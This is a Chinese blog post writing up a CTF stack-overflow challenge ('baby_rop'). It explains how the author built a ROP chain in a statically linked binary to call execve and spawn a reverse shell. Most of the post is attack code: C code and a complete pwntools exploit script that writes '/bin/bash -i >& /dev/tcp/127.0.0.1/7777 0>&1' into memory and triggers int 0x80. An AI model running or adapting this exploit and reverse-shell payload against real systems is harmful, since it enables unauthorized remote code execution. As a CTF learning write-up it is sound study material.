execve反弹shell | Aryb1n's notebook

execve反弹shell

Aryb1n 7月 08, 2018

我们铁三第一道题目baby_rop

开始想…大概是, 一个栈溢出, 静态链接, 所以用ROPGadget的ropchain就OK

回车是坏字符…中间艰辛操作…然后补上来

还遇到了找int 80h的坑…我再也不用--only了

反正最后改好了shellcode…结果, GG, gdb里看到shell起来了, 但弹不回来, 弹不会来啊, mdzz

感觉应该是因为题目是一个Server, fork出来的进程处理用户输入…是不是这个fork的锅

最后想到了execve反弹shell, 开始想到使用nc…但后来查了一下…ubuntu自带的nc不带-e参数

然后想直接bash反弹shell吧…然而…

遇到了一个坑
开始我是这样写的

char *arguments[7]= {
    "/bin/sh",
    "-i",
    ">&",
    "/dev/tcp/127.0.0.1/7777",
    "0>&1",
    NULL
};
execve("/bin/sh", arguments, NULL);

结果…报了一万个错, 改了半天也不行…

最后发现了正确的姿势, 不直接-i, 先用-c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    char *arguments[7]= {
        "/bin/sh",
        "-c",
        "/bin/bash -i >& /dev/tcp/127.0.0.1/7777 0>&1",
        NULL
    };
    execve("/bin/sh", arguments, NULL);
    return 0;
}

这样的话, 对着写shellcode

由于对齐的问题, 稍作了一下修改

/bin//sh -cvv /bin//bash -i >& /dev/tcp/127.0.0.1/7777 0>&1

四个四个分开就是…

=> 0x080ed060
 /bin
 //sh

=> 0x080ed069
 -cvv

=> 0x080ed06e
 /bin
 //ba
 sh -
 i >&
 /dev
 /tcp
 /127
 .0.0
 .1/7
 777 
 0>&1

=> 0x080ed104 (开始用了地址 0x080ed100, 没有注意到\x00会GG)
 0x080ed060
 0x080ed060
 0x080ed060

存储字符串, 由于execve第一个参数和arg数组第一个元素相同, 就复用了一下…

最后, 填好参数, 填入execve的调用号11, 调用

EAX = 11
EBX = 0x080ed060
ECX = 0x080ed104
EDX = NULL

int 80h

相当于

char *arg[] = {"/bin//sh", "-cvv", "/bin//bash -i >& /dev/tcp/127.0.0.1/7777 0>&1"};
execve("/bin//sh", arg, NULL)

为了凑整…我强行把-c变成了-cvv….笑死我了

然后就OK了

记得先nc监听, 然后再跑脚本

# author: Aryb1n
from pwn import *
from struct import pack

p = remote("localhost", 7745)

p.send(p32(0x500))

pay = ''

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed060) # @ .data
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/bin'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed064) # @ .data + 4
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '//sh'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed068) # @ .data + 8
pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; ret
pay += pack('<I', 0xdeedbeef)


pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed069) # @ .data + 9 
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '-cvv'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding


pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed06d) # @ .data + 13
pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; ret
pay += pack('<I', 0xdeedbeef)

#-----------------------------------------------
pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed06e) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/bin'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed072) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '//ba'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed076) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += 'sh -'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding


pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed07a) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += 'i >&'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding


pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed07e) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/dev'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding


pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed082) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/tcp'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed086) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '/127'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed08a) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '.0.0'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed08e) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '.1/7'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed092) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '777 '
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed096) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += '0>&1'
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed09a) # @ .data + 14
pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; ret
pay += pack('<I', 0xdeedbeef)

#-----------------------------------------------
pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed104) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += pack('<I', 0x080ed060) # 
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed108) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += pack('<I', 0x080ed069) # 
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed10c) # @ .data + 14
pay += pack('<I', 0x080bf3b6) # pop eax ; ret
pay += pack('<I', 0x080ed06e) # 
pay += pack('<I', 0x08099e16) # mov dword ptr [edx], eax ; pop ebx; ret
pay += pack('<I', 0xdeedbeef) # padding
#-----------------------------------------------


pay += pack('<I', 0x080481c5) # pop ebx ; ret
pay += pack('<I', 0x080ed060) # @ .data

pay += pack('<I', 0x08083ca3) # pop ecx ; ret
pay += pack('<I', 0x080ed104) # @ .data

pay += pack('<I', 0x08070f9c) # pop edx ; ret
pay += pack('<I', 0x080ed09a) # @ .data

pay += pack('<I', 0x08048bdf) # xor eax, eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807dfaf) # inc eax ; ret
pay += pack('<I', 0x0807181f) # int 0x80

p.sendline("cccc:" + "b" * 60 + 'd' * 44 + pay)
p.interactive()

关于data的注释可能有问题懒得改了…累死了==